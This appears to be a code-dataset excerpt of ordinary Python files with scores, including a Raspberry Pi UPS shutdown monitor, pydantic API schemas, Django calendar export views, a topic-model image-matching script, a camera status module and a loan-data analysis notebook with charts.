PIN_COM_VALUE = GPIO.input(PIN_COM)
if PIN_COM_VALUE == False:
IS_SHUTDOWN_REQUIRED=True
print "Shutdown required by UPS."
if IS_UPS_INSTALLED == True and IS_SHUTDOWN_REQUIRED == True and IS_POWER_PRESENT_VALUE == False:
print "Shutdown procedure started.."
os.system("shutdown -h now")
time.sleep(15) | spectroo_ups.py | import RPi.GPIO as GPIO
import os
import time
from datetime import datetime
GPIO.setmode(GPIO.BCM)
#do not use
#PIN_FACTORY_RESET_17 = 17 # factory reset
#PIN_UPS_PICO_1 = 27
#PIN_UPS_PICO_2 = 22
PIN_COM = 25
PIN_POWER_PRESENT = 22
#GPIO_10 True if SpectrooUPS installed
PIN_ID=10
GPIO.setwarnings(False)
GPIO.setup(PIN_POWER_PRESENT, GPIO.IN)
GPIO.setup(PIN_COM, GPIO.IN)
GPIO.setup(PIN_ID, GPIO.IN)
IS_UPS_INSTALLED=False
IS_SHUTDOWN_REQUIRED=False
TS_NOPOWER=None
print "Searching for Spectroo UPS..."
while(True):
GPIO.setup(PIN_COM, GPIO.IN)
PIN_COM_VALUE = GPIO.input(PIN_COM)
PIN_ID_VALUE = GPIO.input(PIN_ID)
#send 100ms 0 to UPS #watchdog
GPIO.setup(PIN_COM, GPIO.OUT)
GPIO.output(PIN_COM,False)
time.sleep(0.1)
if IS_UPS_INSTALLED == True and PIN_ID_VALUE == False:
IS_UPS_INSTALLED=False
print "Spectroo UPS disconected."
if PIN_ID_VALUE == False:
#sleep 5 seconds if UPS is not detected
time.sleep(5)
continue
if IS_UPS_INSTALLED == False and PIN_ID_VALUE == True:
IS_UPS_INSTALLED=True
print "Spectroo UPS detected."
if IS_UPS_INSTALLED == True and PIN_COM_VALUE == False:
IS_SHUTDOWN_REQUIRED=True
IS_POWER_PRESENT_VALUE = GPIO.input(PIN_POWER_PRESENT)
if IS_UPS_INSTALLED == True and IS_POWER_PRESENT_VALUE == False:
if TS_NOPOWER is None:
TS_NOPOWER=datetime.now()
else:
try:
diff = (datetime.now() - TS_NOPOWER)
diff = diff.total_seconds()
if diff > 20:
IS_SHUTDOWN_REQUIRED=True
print "Power not present for more than 20 seconds ... shutdown flag true"
except:
pass
else:
TS_NOPOWER=None
IS_SHUTDOWN_REQUIRED=False
#test id shutdown is notified by ups
GPIO.setup(PIN_COM, GPIO.IN)
time.sleep(0.2)
PIN_COM_VALUE = GPIO.input(PIN_COM)
if PIN_COM_VALUE == False:
IS_SHUTDOWN_REQUIRED=True
print "Shutdown required by UPS."
if IS_UPS_INSTALLED == True and IS_SHUTDOWN_REQUIRED == True and IS_POWER_PRESENT_VALUE == False:
print "Shutdown procedure started.."
os.system("shutdown -h now")
time.sleep(15) | 0.047272 | 0.084682 |
import datetime
from typing import Dict, List, Optional
from pydantic import constr, Field, root_validator, StrictStr, validator
from aspen.api.schemas.base import BaseRequest, BaseResponse
from aspen.database.models import TreeType
# What kinds of ondemand nextstrain builds do we support?
PHYLO_TREE_TYPES = [
TreeType.OVERVIEW.value,
TreeType.NON_CONTEXTUALIZED.value,
TreeType.TARGETED.value,
]
class TemplateArgsRequest(BaseRequest):
filter_start_date: Optional[datetime.date]
filter_end_date: Optional[datetime.date]
filter_pango_lineages: Optional[List[constr(regex=r"^[0-9A-Z.]+$")]] # type: ignore # noqa
class PhyloRunRequest(BaseRequest):
# mypy + pydantic is a work in progress: https://github.com/samuelcolvin/pydantic/issues/156
name: constr(min_length=1, max_length=128, strict=True) # type: ignore
samples: List[StrictStr]
tree_type: StrictStr
template_args: Optional[TemplateArgsRequest]
@validator("tree_type")
def tree_type_must_be_supported(cls, value):
uppercase_tree_type = value.upper()
assert uppercase_tree_type in PHYLO_TREE_TYPES
return uppercase_tree_type
class GroupResponse(BaseResponse):
class Config:
orm_mode = True
id: int
name: StrictStr
location: Optional[StrictStr]
class UserResponse(BaseResponse):
id: int
name: str
class TreeResponse(BaseResponse):
id: int
name: Optional[str]
class PhyloRunResponse(BaseResponse):
class Config:
orm_mode = True
allow_population_by_field_name = True
# Return the first phylo tree output. We only expect one, and for this to
# work right, this *depends on our query filtering out other output types!*
@validator("outputs", pre=True)
def resolve_tree(cls, v):
for output in v:
return output
# Workarounds for our SQLAlchemy enums
@validator("tree_type", "workflow_status", pre=True)
def resolve_enums(cls, v):
return v.value
@root_validator(pre=False)
def _set_fields(cls, values: dict) -> dict:
if values["name"]:
return values
# Generate a nice tree name if one doesn't exist
# template_args should be transparently deserialized into a python dict.
# but if something is wrong with the data in the column (i.e. the json is
# double escaped), it will be a string instead.
location = values["group"].location
if values["outputs"]:
values["name"] = values["outputs"].name
return values
if isinstance(values["template_args"], Dict):
template_args = values["template_args"]
location = template_args.get("location", location)
values[
"name"
] = f"{location} Tree {values['start_datetime'].strftime('%Y-%m-%d')}"
return values
id: int
start_datetime: datetime.datetime
end_datetime: Optional[datetime.datetime]
workflow_status: str
template_args: Dict
name: Optional[str]
group: GroupResponse
template_file_path: Optional[StrictStr]
tree_type: Optional[str]
user: Optional[UserResponse]
# This lets us remap phlo_run.outputs to phylo_run.phylo_tree using the validator above
outputs: Optional[TreeResponse] = Field(alias="phylo_tree")
class PhyloRunDeleteResponse(BaseResponse):
id: int
class PhyloRunsListResponse(BaseResponse):
phylo_runs: List[PhyloRunResponse]
class PhyloRunUpdateRequest(BaseRequest):
name: constr(min_length=1, max_length=128, strip_whitespace=True) # type: ignore | src/backend/aspen/api/schemas/phylo_runs.py | import datetime
from typing import Dict, List, Optional
from pydantic import constr, Field, root_validator, StrictStr, validator
from aspen.api.schemas.base import BaseRequest, BaseResponse
from aspen.database.models import TreeType
# What kinds of ondemand nextstrain builds do we support?
PHYLO_TREE_TYPES = [
TreeType.OVERVIEW.value,
TreeType.NON_CONTEXTUALIZED.value,
TreeType.TARGETED.value,
]
class TemplateArgsRequest(BaseRequest):
filter_start_date: Optional[datetime.date]
filter_end_date: Optional[datetime.date]
filter_pango_lineages: Optional[List[constr(regex=r"^[0-9A-Z.]+$")]] # type: ignore # noqa
class PhyloRunRequest(BaseRequest):
# mypy + pydantic is a work in progress: https://github.com/samuelcolvin/pydantic/issues/156
name: constr(min_length=1, max_length=128, strict=True) # type: ignore
samples: List[StrictStr]
tree_type: StrictStr
template_args: Optional[TemplateArgsRequest]
@validator("tree_type")
def tree_type_must_be_supported(cls, value):
uppercase_tree_type = value.upper()
assert uppercase_tree_type in PHYLO_TREE_TYPES
return uppercase_tree_type
class GroupResponse(BaseResponse):
class Config:
orm_mode = True
id: int
name: StrictStr
location: Optional[StrictStr]
class UserResponse(BaseResponse):
id: int
name: str
class TreeResponse(BaseResponse):
id: int
name: Optional[str]
class PhyloRunResponse(BaseResponse):
class Config:
orm_mode = True
allow_population_by_field_name = True
# Return the first phylo tree output. We only expect one, and for this to
# work right, this *depends on our query filtering out other output types!*
@validator("outputs", pre=True)
def resolve_tree(cls, v):
for output in v:
return output
# Workarounds for our SQLAlchemy enums
@validator("tree_type", "workflow_status", pre=True)
def resolve_enums(cls, v):
return v.value
@root_validator(pre=False)
def _set_fields(cls, values: dict) -> dict:
if values["name"]:
return values
# Generate a nice tree name if one doesn't exist
# template_args should be transparently deserialized into a python dict.
# but if something is wrong with the data in the column (i.e. the json is
# double escaped), it will be a string instead.
location = values["group"].location
if values["outputs"]:
values["name"] = values["outputs"].name
return values
if isinstance(values["template_args"], Dict):
template_args = values["template_args"]
location = template_args.get("location", location)
values[
"name"
] = f"{location} Tree {values['start_datetime'].strftime('%Y-%m-%d')}"
return values
id: int
start_datetime: datetime.datetime
end_datetime: Optional[datetime.datetime]
workflow_status: str
template_args: Dict
name: Optional[str]
group: GroupResponse
template_file_path: Optional[StrictStr]
tree_type: Optional[str]
user: Optional[UserResponse]
# This lets us remap phlo_run.outputs to phylo_run.phylo_tree using the validator above
outputs: Optional[TreeResponse] = Field(alias="phylo_tree")
class PhyloRunDeleteResponse(BaseResponse):
id: int
class PhyloRunsListResponse(BaseResponse):
phylo_runs: List[PhyloRunResponse]
class PhyloRunUpdateRequest(BaseRequest):
name: constr(min_length=1, max_length=128, strip_whitespace=True) # type: ignore | 0.870886 | 0.323727 |
from django.http import HttpResponse
from django.shortcuts import get_object_or_404
from django.utils.tzinfo import LocalTimezone
from woodstock.models import EventPart
from woodstock import settings
import icalendar
import datetime
import random
import hashlib
def _event_part_ics(event_parts):
cal = icalendar.Calendar()
cal.add('prodid', '-//Woodstock//')
cal.add('version', '2.0')
cal.add('method', 'REQUEST')
cal.add('CALSCALE', 'GREGORIAN')
for event_part in event_parts:
event = icalendar.Event()
event.add('summary', settings.ICS_EVENT_PART_NAME % {'event_name': event_part.event.translation.name, 'part_name': event_part.name})
tz_start = LocalTimezone(event_part.date_start)
event.add('dtstart', event_part.date_start.replace(tzinfo=tz_start))
tz_end = LocalTimezone(event_part.date_end)
event.add('dtend', event_part.date_end.replace(tzinfo=tz_end))
tz_stamp = LocalTimezone(datetime.datetime.now())
event.add('dtstamp', datetime.datetime.now().replace(tzinfo=tz_stamp))
event['uid'] = '%s/%s/woodstock' % (event_part.id, hashlib.md5(str(random.random())).hexdigest()[:10])
event.add('priority', 5)
cal.add_component(event)
response = HttpResponse(cal.as_string(), mimetype="text/calendar")
response['Content-Disposition'] = 'attachment; filename=event.ics'
return response
def event_part_view(request, event_part_id):
event_part = get_object_or_404(EventPart, pk=event_part_id)
ics = _event_part_ics([event_part])
response = HttpResponse(ics, mimetype="text/calendar")
response['Content-Disposition'] = 'attachment; filename=event.ics'
return response
def event_parts_email_view(request, participant, event):
"""
This view is showed using the pennyblack proxy view.
"""
event_parts = EventPart.objects.filter(event=event, attendances__participant=participant)
ics = _event_part_ics(event_parts)
response = HttpResponse(ics, mimetype="text/calendar")
response['Content-Disposition'] = 'attachment; filename=event.ics'
return response | woodstock/views/ics.py | from django.http import HttpResponse
from django.shortcuts import get_object_or_404
from django.utils.tzinfo import LocalTimezone
from woodstock.models import EventPart
from woodstock import settings
import icalendar
import datetime
import random
import hashlib
def _event_part_ics(event_parts):
cal = icalendar.Calendar()
cal.add('prodid', '-//Woodstock//')
cal.add('version', '2.0')
cal.add('method', 'REQUEST')
cal.add('CALSCALE', 'GREGORIAN')
for event_part in event_parts:
event = icalendar.Event()
event.add('summary', settings.ICS_EVENT_PART_NAME % {'event_name': event_part.event.translation.name, 'part_name': event_part.name})
tz_start = LocalTimezone(event_part.date_start)
event.add('dtstart', event_part.date_start.replace(tzinfo=tz_start))
tz_end = LocalTimezone(event_part.date_end)
event.add('dtend', event_part.date_end.replace(tzinfo=tz_end))
tz_stamp = LocalTimezone(datetime.datetime.now())
event.add('dtstamp', datetime.datetime.now().replace(tzinfo=tz_stamp))
event['uid'] = '%s/%s/woodstock' % (event_part.id, hashlib.md5(str(random.random())).hexdigest()[:10])
event.add('priority', 5)
cal.add_component(event)
response = HttpResponse(cal.as_string(), mimetype="text/calendar")
response['Content-Disposition'] = 'attachment; filename=event.ics'
return response
def event_part_view(request, event_part_id):
event_part = get_object_or_404(EventPart, pk=event_part_id)
ics = _event_part_ics([event_part])
response = HttpResponse(ics, mimetype="text/calendar")
response['Content-Disposition'] = 'attachment; filename=event.ics'
return response
def event_parts_email_view(request, participant, event):
"""
This view is showed using the pennyblack proxy view.
"""
event_parts = EventPart.objects.filter(event=event, attendances__participant=participant)
ics = _event_part_ics(event_parts)
response = HttpResponse(ics, mimetype="text/calendar")
response['Content-Disposition'] = 'attachment; filename=event.ics'
return response | 0.367384 | 0.089614 |
import argparse
import pandas as pd
from tqdm import tqdm
from PIL import Image
import numpy as np
from contextualized_topic_models.datasets.dataset import CTMDataset
from sklearn.metrics.pairwise import cosine_similarity
from utils import load_model
from sentence_transformers import SentenceTransformer, util
import pickle
import scipy
import numpy as np
import os
os.environ["TOKENIZERS_PARALLELISM"] = "false"
parser = argparse.ArgumentParser()
parser.add_argument("--text_model", type=str, required=True)
parser.add_argument("--image_model", type=str, required=True)
parser.add_argument("--tp", type=str, required=True)
args = parser.parse_args()
text_list = pd.read_csv(open("./Data2021/MediaEvalNewsImagesBatch04articles.tsv", "r"), sep="\t")
image_list = pd.read_csv(open("./Data2021/MediaEvalNewsImagesBatch04images.tsv", "r"), sep="\t")
texts = []
text_ids = []
for _, r in tqdm(text_list.iterrows(), desc="Loading texts"):
if not pd.isnull(r.text):
texts.append(r.title + ". " + r.text)
text_ids.append(r.articleID)
images = []
image_ids = []
for _, r in tqdm(image_list.iterrows(), desc="loading images"):
if not pd.isnull(r.imgFile) and os.path.exists(os.path.join("./Data2021/images", r.imgFile)):
img = Image.open(os.path.join("./Data2021/images", r.imgFile))
img = img.convert("RGB")
images.append(img)
image_ids.append(r.imgFile)
tp = pickle.load(open(args.tp, "rb"))
ctm = load_model(args.text_model, len(tp.vocab))
vctm = load_model(args.image_model, len(tp.vocab))
testing_dataset = tp.transform(text_for_contextual=texts)
img_model = SentenceTransformer('clip-ViT-B-32')
img_emb = img_model.encode(images, batch_size=128, convert_to_tensor=True, show_progress_bar=True)
img_emb = np.array(img_emb.cpu())
image_test_bow_embeddings = scipy.sparse.csr_matrix(np.zeros((len(img_emb), 1)))
image_testing_dataset = CTMDataset(X_contextual = img_emb, X_bow=image_test_bow_embeddings ,idx2token = testing_dataset.idx2token)
test_topic_dist = ctm.get_doc_topic_distribution(testing_dataset, n_samples=20)
v_test_topic_dist = vctm.get_doc_topic_distribution(image_testing_dataset, n_samples=20)
dist_sim = cosine_similarity(test_topic_dist, v_test_topic_dist)
model_type, n_topics = os.path.basename(args.text_model).split("_")[:2]
with open(model_type+"_"+n_topics+"_submission.csv", "w") as out:
for doc in tqdm(range(len(texts)), desc="Searching images"):
ind_sims = sorted([(s,i) for i, s in enumerate(dist_sim[doc])], reverse=True)
ind_sims = [i[1] for i in ind_sims]
img_ids = [image_ids[i] for i in ind_sims]
print(str(int(text_ids[doc]))+"\t"+"\t".join(img_ids), file=out) | make_submission.py | import argparse
import pandas as pd
from tqdm import tqdm
from PIL import Image
import numpy as np
from contextualized_topic_models.datasets.dataset import CTMDataset
from sklearn.metrics.pairwise import cosine_similarity
from utils import load_model
from sentence_transformers import SentenceTransformer, util
import pickle
import scipy
import numpy as np
import os
os.environ["TOKENIZERS_PARALLELISM"] = "false"
parser = argparse.ArgumentParser()
parser.add_argument("--text_model", type=str, required=True)
parser.add_argument("--image_model", type=str, required=True)
parser.add_argument("--tp", type=str, required=True)
args = parser.parse_args()
text_list = pd.read_csv(open("./Data2021/MediaEvalNewsImagesBatch04articles.tsv", "r"), sep="\t")
image_list = pd.read_csv(open("./Data2021/MediaEvalNewsImagesBatch04images.tsv", "r"), sep="\t")
texts = []
text_ids = []
for _, r in tqdm(text_list.iterrows(), desc="Loading texts"):
if not pd.isnull(r.text):
texts.append(r.title + ". " + r.text)
text_ids.append(r.articleID)
images = []
image_ids = []
for _, r in tqdm(image_list.iterrows(), desc="loading images"):
if not pd.isnull(r.imgFile) and os.path.exists(os.path.join("./Data2021/images", r.imgFile)):
img = Image.open(os.path.join("./Data2021/images", r.imgFile))
img = img.convert("RGB")
images.append(img)
image_ids.append(r.imgFile)
tp = pickle.load(open(args.tp, "rb"))
ctm = load_model(args.text_model, len(tp.vocab))
vctm = load_model(args.image_model, len(tp.vocab))
testing_dataset = tp.transform(text_for_contextual=texts)
img_model = SentenceTransformer('clip-ViT-B-32')
img_emb = img_model.encode(images, batch_size=128, convert_to_tensor=True, show_progress_bar=True)
img_emb = np.array(img_emb.cpu())
image_test_bow_embeddings = scipy.sparse.csr_matrix(np.zeros((len(img_emb), 1)))
image_testing_dataset = CTMDataset(X_contextual = img_emb, X_bow=image_test_bow_embeddings ,idx2token = testing_dataset.idx2token)
test_topic_dist = ctm.get_doc_topic_distribution(testing_dataset, n_samples=20)
v_test_topic_dist = vctm.get_doc_topic_distribution(image_testing_dataset, n_samples=20)
dist_sim = cosine_similarity(test_topic_dist, v_test_topic_dist)
model_type, n_topics = os.path.basename(args.text_model).split("_")[:2]
with open(model_type+"_"+n_topics+"_submission.csv", "w") as out:
for doc in tqdm(range(len(texts)), desc="Searching images"):
ind_sims = sorted([(s,i) for i, s in enumerate(dist_sim[doc])], reverse=True)
ind_sims = [i[1] for i in ind_sims]
img_ids = [image_ids[i] for i in ind_sims]
print(str(int(text_ids[doc]))+"\t"+"\t".join(img_ids), file=out) | 0.144752 | 0.155463 |
from cam_status import cputemp
from cam_status import temp_sensor
import time
from datetime import timedelta
from uptime import uptime
import os
import psutil
import subprocess
import re
import shutil
def time_string(include_timezone):
if include_timezone:
return time.strftime('%Y-%m-%d %H:%M:%S %Z')
else:
return time.strftime('%Y-%m-%d %H:%M:%S')
def sys_uptime():
current_uptime = timedelta(seconds=round(uptime()))
result = ''
if current_uptime.days > 0:
result = f'{current_uptime.days}d '
hours, remainder = divmod(current_uptime.seconds, 3600)
minutes, seconds = divmod(remainder, 60)
result += f'{hours:02}:{minutes:02}:{seconds:02}'
return result
def load_avg():
return os.getloadavg()
def cpu():
return round(psutil.cpu_percent())
def ram_used():
meminfo = psutil.virtual_memory()
return round(meminfo.used / (1024 * 1024))
def ram_free():
meminfo = psutil.virtual_memory()
free = round(meminfo.free / (1024 * 1024))
cached = round(meminfo.cached / (1024 * 1024))
return free + cached
def cpu_temp():
return cputemp.temperature
def case_temp():
result = -999
try:
result = temp_sensor.temperature
except:
pass
return result
def case_humidity():
result = -999
try:
result = temp_sensor.relative_humidity
except:
pass
return result
def wifi():
quality = 0
max_quality = 100
signal = 0
iwconfig = subprocess.run(['iwconfig', 'wlan0'], stdout=subprocess.PIPE).stdout.decode('utf-8')
pattern = re.compile('Link Quality=([0-9]*)/([0-9]*).*Signal level=([-0-9]*)')
values = pattern.search(iwconfig)
if values is not None:
quality = int(values.group(1))
max_quality = int(values.group(2))
signal = int(values.group(3))
quality_percent = (quality / max_quality) * 100
return (round(quality_percent), signal)
def camera_active():
streamer = subprocess.run(['pgrep', 'mjpg_streamer'], stdout=subprocess.PIPE).stdout.decode('utf-8')
return True if len(streamer) > 0 else False
def disk_space():
return shutil.disk_usage('/').free / 1073742000 | cam_pi/cam_status/cam_status.py | from cam_status import cputemp
from cam_status import temp_sensor
import time
from datetime import timedelta
from uptime import uptime
import os
import psutil
import subprocess
import re
import shutil
def time_string(include_timezone):
if include_timezone:
return time.strftime('%Y-%m-%d %H:%M:%S %Z')
else:
return time.strftime('%Y-%m-%d %H:%M:%S')
def sys_uptime():
current_uptime = timedelta(seconds=round(uptime()))
result = ''
if current_uptime.days > 0:
result = f'{current_uptime.days}d '
hours, remainder = divmod(current_uptime.seconds, 3600)
minutes, seconds = divmod(remainder, 60)
result += f'{hours:02}:{minutes:02}:{seconds:02}'
return result
def load_avg():
return os.getloadavg()
def cpu():
return round(psutil.cpu_percent())
def ram_used():
meminfo = psutil.virtual_memory()
return round(meminfo.used / (1024 * 1024))
def ram_free():
meminfo = psutil.virtual_memory()
free = round(meminfo.free / (1024 * 1024))
cached = round(meminfo.cached / (1024 * 1024))
return free + cached
def cpu_temp():
return cputemp.temperature
def case_temp():
result = -999
try:
result = temp_sensor.temperature
except:
pass
return result
def case_humidity():
result = -999
try:
result = temp_sensor.relative_humidity
except:
pass
return result
def wifi():
quality = 0
max_quality = 100
signal = 0
iwconfig = subprocess.run(['iwconfig', 'wlan0'], stdout=subprocess.PIPE).stdout.decode('utf-8')
pattern = re.compile('Link Quality=([0-9]*)/([0-9]*).*Signal level=([-0-9]*)')
values = pattern.search(iwconfig)
if values is not None:
quality = int(values.group(1))
max_quality = int(values.group(2))
signal = int(values.group(3))
quality_percent = (quality / max_quality) * 100
return (round(quality_percent), signal)
def camera_active():
streamer = subprocess.run(['pgrep', 'mjpg_streamer'], stdout=subprocess.PIPE).stdout.decode('utf-8')
return True if len(streamer) > 0 else False
def disk_space():
return shutil.disk_usage('/').free / 1073742000 | 0.253122 | 0.108566 |
# In[10]:
import numpy as np
import pandas as pd
loandata = pd.DataFrame(pd.read_excel('D:\data analysis\Data capture\loandata.xlsx'))
# In[11]:
loandata
# In[31]:
loandata.duplicated().value_counts()
# In[13]:
loandata.drop_duplicates()
# In[14]:
loandata['loan_amnt'].isnull().value_counts()
# In[15]:
loandata['annual_inc'].isnull().value_counts()
# In[16]:
loandata['loan_amnt'] = loandata['loan_amnt'].fillna(loandata['total_pymnt'] - loandata['total_rec_int']).astype(np.int64)
# In[18]:
loandata['annual_inc'] = loandata['annual_inc'].fillna(loandata['annual_inc'].mean())
# In[20]:
loandata['annual_inc']
# In[21]:
loandata['loan_status'].value_counts()
# In[27]:
loandata['emp_length'].apply(lambda x : x.isalpha())
# In[28]:
loandata['emp_length'].apply(lambda x : x.isalnum())
# In[29]:
loandata['emp_length'].apply(lambda x : x.isdigit())
# In[30]:
loandata.describe().astype(np.int64).T
# In[35]:
import numpy as np
import pandas as pd
loandata = pd.DataFrame(pd.read_excel('D:\data analysis\Data capture\loandata.xlsx'))
# In[36]:
loandata
# In[53]:
loandata.duplicated().value_counts()
# In[54]:
loandata.drop_duplicates()
# In[41]:
loandata.duplicated().value_counts()
# In[55]:
loandata
# In[44]:
loandata.drop_duplicates()
# In[45]:
loandata
# In[46]:
loandata['loan_amnt'].isnull().value_counts()
# In[47]:
loandata['annual_inc'].isnull().value_counts()
# In[58]:
loandata['loan_amnt']=loandata['loan_amnt'].fillna(loandata['total_pymnt']-loandata['total_rec_int'])
# In[59]:
loandata['annual_inc'] = loandata['annual_inc'].fillna(loandata['annual_inc'].mean())
# In[60]:
loandata['loan_status'].value_counts()
# In[65]:
loandata.describe().T
# In[66]:
loandata.replace([3.500000e+04,500.0],loandata['loan_amnt'].mean())
# In[67]:
loandata['loan_amnt'] = loandata['loan_amnt'].astype(np.int64)
# In[69]:
loandata['issue_d'] = pd.to_datetime(loandata['issue_d'])
# In[70]:
loandata.dtypes
# In[71]:
bins = [0,5,10,15,20]
group_names = ['A','B','C','D']
loandata['categories'] = pd.cut(loandata['open_acc'],bins,labels = group_names)
# In[72]:
loandata
# In[73]:
loandata = loandata.set_index('member_id')
# In[74]:
import numpy as np
import pandas as dp
loandata = pd.DataFrame(pd.read_excel('D:\data analysis\Data capture\loandata.xlsx'))
# In[75]:
loandata = loandata.set_index('member_id')
# In[77]:
loandata.head()
# In[78]:
loandata.ix[41000]
# In[79]:
loandata.ix[:,'emp_length']
# In[81]:
loandata.ix[41000,'emp_length']
# In[82]:
loandata.ix[[41000,41001],'loan_amnt']
# In[85]:
loandata.ix[[41000,41001],'loan_amnt'].sum()
# In[86]:
loandata.ix[41000,['loan_amnt','annual_inc']]
# In[87]:
loandata.ix[41000,['loan_data','annual_inc']].sum()
# In[88]:
loandata = loandata.set_index('issue_d')
# In[89]:
loandata
# In[93]:
loandata['2018']
# In[99]:
loandata['2018-03':'2018-05']
# In[101]:
loandata.resample('W',how=sum).head(10)
# In[102]:
loandata.resample('M',how = sum)
# In[103]:
loandata.resample('Q',how = sum)
# In[104]:
loandata.resample('A',how = sum)
# In[105]:
loandata['loan_amnt'].resample('M',how = sum).fillna(0)
# In[106]:
loandata[['loan_amnt','total_rec_int']].resample('M',how = [len,sum])
# In[107]:
loandata['2018-02':'2018-05'].resample('M',how = sum).fillna(0)
# In[108]:
loandata[loandata['loan_amnt'] > 5000].resample('M',how = sum).fillna(0)
# In[114]:
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
loandata = pd.DataFrame(pd.read_excel('D:\data analysis\Data capture\loandata.xlsx'))
# In[115]:
loandata = loandata.set_index('issue_d')
# In[112]:
loandata
# In[116]:
loan_plot = loandata['loan_amnt'].resample('M').fillna(0)
# In[117]:
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
loandata = pd.DataFrame(pd.read_excel('D:\data analysis\Data capture\loandata.xlsx'))
# In[119]:
loandata = loandata.set_index('issue_d')
# In[121]:
loandata
# In[122]:
loan_plot = loandata['loan_amnt'].resample('M').fillna(0)
# In[123]:
loan_plot = loandata['loan_amnt'].resample('M').fillna(0)
# In[124]:
loan_grade = loandata.groupby('grade')['loan_amnt'].agg(sum)
# In[125]:
plt.rc('font',family = 'STXihei',size = 15)
# In[126]:
a = np.array([1,2,3,4,5,6])
# In[133]:
plt.bar([1,2,3,4,5,6,7],loan_grade,color='#99CC01',alpha=0.8,align='center',edgecolor='white')
plt.xlabel('用户等级')
plt.ylabel('贷款金额')
plt.title('不同用户等级的贷款金额分布')
plt.legend(['贷款金额'],loc = 'upper right')
plt.grid(color = '#95a5a6',linestyle = '--',linewidth = 1,axis = 'y',alpha=0.4)
plt.xticks(a,('A级','B级','C级','D级','E级','F级','G级'))
plt.show()
# In[136]:
#图表字体为华文细黑,字号为15
plt.rc('font', family='STXihei', size=15)
#创建一个一维数组赋值给a
a=np.array([1,2,3,4,5,6])
#创建条形图,数据源为分等级贷款金额汇总,设置颜色,透明度和图表边框
plt.barh([1,2,3,4,5,6,7],loan_grade,color='#99CC01',alpha=0.8,align='center',edgecolor='white')
plt.xlabel('贷款金额')
plt.ylabel('用户等级')
plt.title('不同用户等级的贷款金额分布')
#添加图例,并设置在图表中的显示位置
plt.legend(['贷款金额'], loc='upper right')
#设置背景网格线的颜色,样式,尺寸和透明度
plt.grid(color='#95a5a6',linestyle='--', linewidth=1,axis='y',alpha=0.4)
#设置数据分类名称
plt.yticks(a,('A级','B级','C级','D级','E级','F级','G级'))
#显示图表
plt.show()
# In[142]:
#图表字体为华文细黑,字号为15
plt.rc('font', family='STXihei', size=15)
#设置饼图中每个数据分类的颜色
colors = ["#99CC01","#FFFF01","#0000FE","#FE0000","#A6A6A6","#D9E021"]
#设置饼图中每个数据分类的名称
name=['A级', 'B级', 'C级', 'D级', 'E级','F级','G级']
#创建饼图,设置分类标签,颜色和图表起始位置等
plt.pie(loan_grade,labels=name,colors=colors,explode=(0, 0, 0.15, 0, 0, 0,0),startangle=60,autopct='%1.1f%%')
#添加图表标题
plt.title('不同用户等级的贷款金额占比')
#添加图例,并设置显示位置
plt.legend(['A级','B级','C级','D级','E级','F级','G级'], loc='upper left')
#显示图表
plt.show()
# In[143]:
#按月汇总贷款金额,以0填充空值
loan_x=loandata['loan_amnt'].resample('M',how=sum).fillna(0)
#按月汇总利息金额,以0填充空值
loan_y=loandata['total_rec_int'].resample('M',how=sum).fillna(0)
#图表字体为华文细黑,字号为15
plt.rc('font', family='STXihei', size=15)
#创建散点图,贷款金额为x,利息金额为y,设置颜色,标记点样式和透明度等
plt.scatter(loan_x,loan_y,60,color='white',marker='o',edgecolors='#0D8ECF',linewidth=3,alpha=0.8)
#添加x轴标题
plt.xlabel('贷款金额')
#添加y轴标题
plt.ylabel('利息收入')
#添加图表标题
plt.title('贷款金额与利息收入')
#设置背景网格线的颜色,样式,尺寸和透明度
plt.grid(color='#95a5a6',linestyle='--', linewidth=1,axis='both',alpha=0.4)
#显示图表
plt.show()
# In[145]:
#按月汇总贷款金额及利息
loan_x=loandata['loan_amnt'].resample('M',how=sum).fillna(0)
loan_y=loandata['total_rec_int'].resample('M',how=sum).fillna(0)
loan_z=loandata['total_rec_int'].resample('M',how=sum).fillna(0)
#图表字体为华文细黑,字号为15
plt.rc('font', family='STXihei', size=15)
#设置气泡图颜色
colors = ["#99CC01","#FFFF01","#0000FE","#FE0000","#A6A6A6","#D9E021",'#FFF16E','#0D8ECF','#FA4D3D','#D2D2D2','#FFDE45','#9b59b6']
#创建气泡图贷款金额为x,利息金额为y,同时设置利息金额为气泡大小,并设置颜色透明度等。
plt.scatter(loan_x,loan_y,s=loan_z,color=colors,alpha=0.6)
#添加x轴标题
plt.xlabel('贷款金额')
#添加y轴标题
plt.ylabel('利息收入')
#添加图表标题
plt.title('贷款金额与利息收入')
#设置背景网格线的颜色,样式,尺寸和透明度
plt.grid(color='#95a5a6',linestyle='--', linewidth=1,axis='both',alpha=0.4)
#显示图表
plt.show()
# In[146]:
#图表字体为华文细黑,字号为15
plt.rc('font', family='STXihei', size=15)
#创建箱线图,数据源为贷款来源,设置横向显示
plt.boxplot(loandata['loan_amnt'],1,'rs',vert=False)
#添加x轴标题
plt.xlabel('贷款金额')
#添加图表标题
plt.title('贷款金额分布')
#设置背景网格线的颜色,样式,尺寸和透明度
plt.grid(color='#95a5a6',linestyle='--', linewidth=1,axis='both',alpha=0.4)
#显示图表
plt.show()
# In[147]:
#图表字体为华文细黑,字号为15
plt.rc('font', family='STXihei', size=15)
#创建直方图,数据源为贷款金额,将数据分为8等份显示,设置颜色和显示方式,透明度等
plt.hist(loandata['loan_amnt'],8,normed=1, histtype='stepfilled',facecolor='#99CC01', rwidth=0.9,alpha=0.6,edgecolor='white')
#添加x轴标题
plt.xlabel('贷款金额')
#添加y轴标题
plt.ylabel('概率')
#添加图表标题
plt.title('贷款金额概率密度')
#设置背景网格线的颜色,样式,尺寸和透明度
plt.grid(color='#95a5a6',linestyle='--', linewidth=1,axis='y',alpha=0.4)
#显示图表
plt.show()
# In[148]:
#导入机器学习KNN分析库
from sklearn.neighbors import KNeighborsClassifier
#导入交叉验证库
from sklearn import cross_validation
#导入数值计算库
import numpy as np
#导入科学计算库
import pandas as pd
#导入图表库
import matplotlib.pyplot as plt
# In[149]:
#读取并创建名为knn_data的数据表
knn_data=pd.DataFrame(pd.read_excel('D:\data analysis\Data capture\knn_data.xlsx'))
# In[150]:
#查看数据表前10行
knn_data.head(10)
# In[151]:
#Fully Paid数据集的x1
fully_paid_loan=knn_data.loc[(knn_data["loan_status"] == "Fully Paid"),["loan_amnt"]]
#Fully Paid数据集的y1
fully_paid_annual=knn_data.loc[(knn_data["loan_status"] == "Fully Paid"),["annual_inc"]]
#Charge Off数据集的x2
charged_off_loan=knn_data.loc[(knn_data["loan_status"] == "Charged Off"),["loan_amnt"]]
